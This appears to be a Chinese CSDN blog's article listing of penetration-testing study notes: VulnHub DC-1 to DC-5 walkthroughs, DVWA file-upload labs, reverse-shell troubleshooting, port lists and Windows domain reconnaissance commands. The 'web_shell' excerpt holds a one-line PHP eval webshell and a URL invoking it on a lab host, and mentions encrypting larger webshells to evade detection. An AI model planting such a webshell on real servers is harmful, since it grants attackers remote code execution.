- 博客(17)
- 问答 (1)
- 收藏
- 关注
RSS订阅原创 报错分析~csdn反弹shell报错
反弹shell的时候,有点时候连的上有点时候连不上很迷经过测试,csdn会转换文件格式所以你直接复制下来会有问题其他博客网站上的复制暂未发现此问题一、打开端口监听kali监听1234端口 ,kali的ip是192.168.238.138二、手打代码打开反弹shell成功连接三、复制csdn上面的代码同一句话却报错大图,注意error是靶机的小毛病其他命令也会出行忽略即可,因为就算是换成其他靶机csdn上的代码有时也会报错四...
2022-06-07 21:44:16
1348
原创 VulnHub靶场~DC-5
0X00 靶机的环境搭配攻击机(Kali):192.168.238.130靶机(DC-5):192.168.138靶机地址:DC: 5 ~ VulnHub0X01 信息收集一、IP扫描┌──(root㉿kali)-[~]└─#arp-scan -l二、端口扫描┌──(root㉿kali)-[~]└─# nmap -T4 -sV -O -A 192.168.238.138三、网站目录扫描┌──(root㉿kali)...
2022-05-15 00:05:17
777
原创 DC-4 靶机的渗透学习
0X00 靶机的环境搭配攻击机(Kali):192.168靶机(DC-1):192.168靶机地址:DC: 4 ~ VulnHub0X01信息收集一、IP扫描┌──(root㉿kali)-[~]└─# arp-scan -l二、端口扫描┌──(root㉿kali)-[~]└─# nmap -T4 -sV -O -A -p- 192.168.238.136三、网站目录扫描┌──(root㉿kali)-[~]└─# di...
2022-05-11 01:32:47
299
原创 DVWA~文件上传漏洞
靶机介绍实验原理文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回 如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell 一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网 SQL注入攻击的对象是数据库服务,文件上传漏洞
2022-05-09 15:05:16
1183
原创 Kali开机启动配置选项
系统开机配置一、更换源┌──(root㉿kali)-[/home/kali/Desktop]└─# vim /etc/apt/sources.list#deb http://http.kali.org/kali kali-rolling main non-free contribdeb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb-src http://mirrors.aliyun.com/
2022-05-08 21:34:33
4060
原创 web容器、服务器、中间件
我们经常会被Web服务器、Web容器和Web中间件这三个概念搞混。因为我们常见的很多网站要么是由IIS搭建,要么是由Apache、Tomcat、Ngnix搭建。所以,我们会把他们都叫成是Web服务器,因为他们都提供了Web服务,可以让我们通过http协议访问到。但是又有很多地方会说Tomcat是Servlet容器,而又有很多地方会说Tomcat是Web中间件!那么,他们到底是Web服务器还是容器,还是Web中间件呢???怀着这个问题,我查遍了网上所有的资料,终于把这几个概念好好的整理了一下。
2022-05-08 21:30:59
2417
原创 渗透常见端口
0x00 背景通过端口来进行渗透有时会提升我们的效率。端口渗透过程中我们需要关注几个问题:端口的banner信息 端口上运行的服务 常见应用的默认端口当然对于上面这些信息的获取,我们有各式各样的方法,最为常见的应该就是nmap我们也可以结合其他的端口扫描工具,比如专门的3389、1433等等的端口扫描工具;一、服务默认端口公认端口(Well Known Ports):0-1023,他们紧密绑定了一些服务;注册端口(Registered Ports):1024-49151
2022-05-08 21:30:19
3030
原创 web_shell
webshell小马:一句话木马也称为小马,即整个shell代码量只有一行,一般是系统执行函数大马: 代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到shell2.php #eval 使用php函数,例如phpinfo(); <?php eval($_REQUEST['pass']);?>http://192.168.238.131/dvwa/hackable/uploads/shell2.php?pass=phpinfo(); shel
2022-05-08 21:26:50
246
原创 Windows环境下的信息收集
一、判断是域环境还是工作组ipconfigsysteminfonet time /domain #查找域的时间,如果不是域会找不到net time /domain三种情况1、存在域,但是当前用户不是域用户2、存在域,当前用户是域用户3、不存在域二、查看操作系统版本信息和systeminfo | findstr /B /C:"OS name" /C:"OS version"systeminfo | findstr /B /C:"OS 名称"...
2022-05-08 21:10:02
508
原创 DC-3靶机的渗透学习
一、靶机的环境搭配攻击机(KALI):192.168.226.129靶机(DC-1): 192.168.226.133(未知)靶机地址:https://www.vulnhub.com/entry/dc-32,312/二、战前准备2.1IP地址确认命令:arp-scan -l扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)它可以构造并发送ARP请求到指定的IP地址,...
2021-10-01 20:07:29
3293
2
原创 关于一次内网渗透总结
一、靶机的环境搭配攻击机(KALI):192.168.226.129靶机(2008): 192.168.114.1301、配置靶场IP点击win2008-编辑-虚拟机网络编辑器-更改VMnet8,修改子网ip地址为192.168.114.0,应用保存最后本机打开网络共享中心à更改适配器àVMnet8网卡à属性àIPv4协议 修改ip地址为192.168.114.1和默认网关192.168.114.2。二、战前准备1、扫描目标网段命令:arp-sca...
2021-09-29 10:38:39
1660
原创 DC-2靶机的渗透学习
目录0X00 靶机的环境搭配0X01战前准备一、IP扫描二、端口扫描三、网站目录扫描四、查看网站结构三、渗透开始一、flag1二、flag22.1 使用cewl生成密码2.2 使用wpscan扫出用户2.3 找到3个用户admin、jerry、tom,并将他们放入一个文本文件中2.4 开始爆破2.5登录后台网页三、flag33.1 ssh登录3.2 初步查找文件四、flag44.1 绕过rbash五、flag55.1..
2021-09-01 19:11:03
1796
原创 DC-1靶机的渗透学习
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.131(未知) 靶机地址:https://www.vulnhub.com/entry/dc-1,292/二、战前准备 要求:攻击机和靶机在同一网段下,使用NAT模式 1、找到kali的IP地址,用nmap扫描同一网段找到靶机的IP一般扫描出来的在中间而129是kali的,所以可以确定的是靶机的地址是192.168...
2021-08-31 01:51:17
2791
空空如也
burp的重放器一片空白无反应
2022-06-09
TA创建的收藏夹 TA关注的收藏夹
TA关注的人